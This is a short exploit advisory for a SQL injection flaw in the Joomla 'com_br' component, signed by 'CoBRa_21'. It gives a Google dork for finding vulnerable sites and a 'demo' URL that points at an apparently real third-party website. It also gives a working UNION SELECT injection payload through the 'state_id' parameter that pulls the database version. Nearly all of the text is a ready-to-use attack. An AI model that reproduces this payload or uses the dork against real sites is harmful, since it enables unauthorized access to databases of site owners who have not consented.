The Joomla Br component suffers from a remote SQL injection vulnerability.
ca3c46fd8a1ac4746a8d26d5c05689224da306d737b75c48ddafab163f45b02b
################################################################################################
# Exploit Title: Joomla Component (com_br) SQL Injection Vulnerability
#
# Author : CoBRa_21
#
# E-Mail : ghost1lover[at]hotmail.com
#
# Google Dork : inurl:index.php?option=com_br
#
# Demo: https://beginrecovery.com/beta/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=33
################################################################################################
#
# Exploit:
#
# https://127.0.0.1/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=33 (SQL)
#
# https://127.0.0.1/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=-33 union select 0,1,version(),3
################################################################################################
# Pentester CoBRa_21 Thanks e-banka.org & cyber-warrior.org & AKINCILAR #
################################################################################################